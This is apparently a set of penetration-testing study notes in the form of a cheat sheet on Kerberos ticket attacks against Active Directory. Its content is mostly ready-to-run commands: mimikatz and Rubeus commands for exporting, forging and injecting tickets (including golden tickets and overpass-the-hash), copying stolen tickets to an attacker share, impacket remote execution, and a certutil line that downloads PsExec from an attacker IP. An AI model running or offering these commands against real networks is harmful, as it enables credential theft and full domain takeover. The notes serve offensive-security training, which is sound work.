x

Ticket Attacks

24.4.1 - Pass-The-Ticket

Pass-the-Ticket takes advantage of the TGS by exporting service tickets, injecting them into memory (on target) or caching as environment variable (on Kali) and then authenticating with the injected/cached ticket via. Kerberos-based authentication as opposed to NTLM-based authentication.

  • This attack does not require the service/user to have local admin rights on the target.

PTT via. COMPROMISED HOST (exporting -> inject into memory -> psexec.exe)
Extract tickets from memory, TGTs, service tickets and user/service information 

sekurlsa::tickets /export

Display kerberos tickets displayed in the LSA 

kerberos::list

.\Rubeus.exe klist

Inject into memory 

kerberos::ptt [ticket_name.kirbi]

Authenticate to the remote target using the ticket 

psexec.exe \\target.hostname.com cmd

Alternatively use Rubeus 

Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt

PTT via. KALI (exporting -> cache as env var -> psexec.py/smbexec.py/wmiexec.py)
Export tickets -> copy to Kali 

sekurlsa::tickets /export

copy [ticket.kirbi] \\192.168.119.XXX\share\[ticket.kirbi]

Use ticket_converter.py to convert .kirbi to .ccache
https://github.com/Zer1t0/ticket_converter 

python ticket_converter.py ticket.kirbi ticket.ccache

Set the ticket for impacket use 

export KRB5CCNAME=<TGT_ccache_file_path>

Execute remote commands with any of the following by using the TGT 

python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

24.4.3 - TGT Impersonation

Run on the target

Should show no TGT/TGS 

klist

Generate TGT by auth to network share on the computer. Try other comps and targets. 

net use \\SV-FILE01

Should now show TGT/TGS 

klist

certutil -urlcache -split -f http://192.168.119.140:80/PsExec.exe

.\PsExec.exe \\SV-FILE01 cmd.exe

24.4.4 - Golden Ticket + PsExec (Overpass the Hash).

Note that using an IP address instead of a hostname, Kerberos won't work and NTLM will be used (which could fail) 

mimikatz # kerberos::golden /user:<user> /domain:<domain> /sid:<SID> /krbtgt:<NTLM_hash> /ptt

mimikatz # misc::cmd

PsExec.exe \\<hostname> cmd.exe

24.4.5 - Overpass-the-hash

Spawns a process (PS or CMD) with the context of the specified user 

mimikatz # sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<NTLM_HASH> /run:powershell

24.4.6 - Create a Golden Ticket

Creating a golden ticket allows virtually unrestricted access to the whole domain. For this, using mimikatz commands (added a few examples): 

mimikatz "kerberos::golden /user:Administrator /domain:domain.com /sid:S-1-5-21-XXXX /krbtgt:eeb9046b77d48962314e376f1925065a /id:500"

mimikatz # kerberos::golden /user:<user> /domain:<domain> /sid:<domain SID> /krbtgt:<NTLM hash> /ptt

Forge a kerberos TGT as administrator 

kerberos::golden /user:Administrator /domain:AFC-RICHMOND.LOCAL /sid:S-1-5-21-XXXX /krbtgt:<hash> /id:500 /aes256:<aes256_key> /ticket:admin.kirbi

Using RC4 (NTLM) authentication 

kerberos::golden /user:Administrator /domain:AFC-RICHMOND.LOCAL /sid:S-1-5-21-XXXX /rc4:<ntlm_hash> /id:500 /ticket:admin.kirbi

Inject the ticket into the current session 

kerberos::ptt admin.kirbi
Left-click: follow link, Right-click: select node, Scroll: zoom
x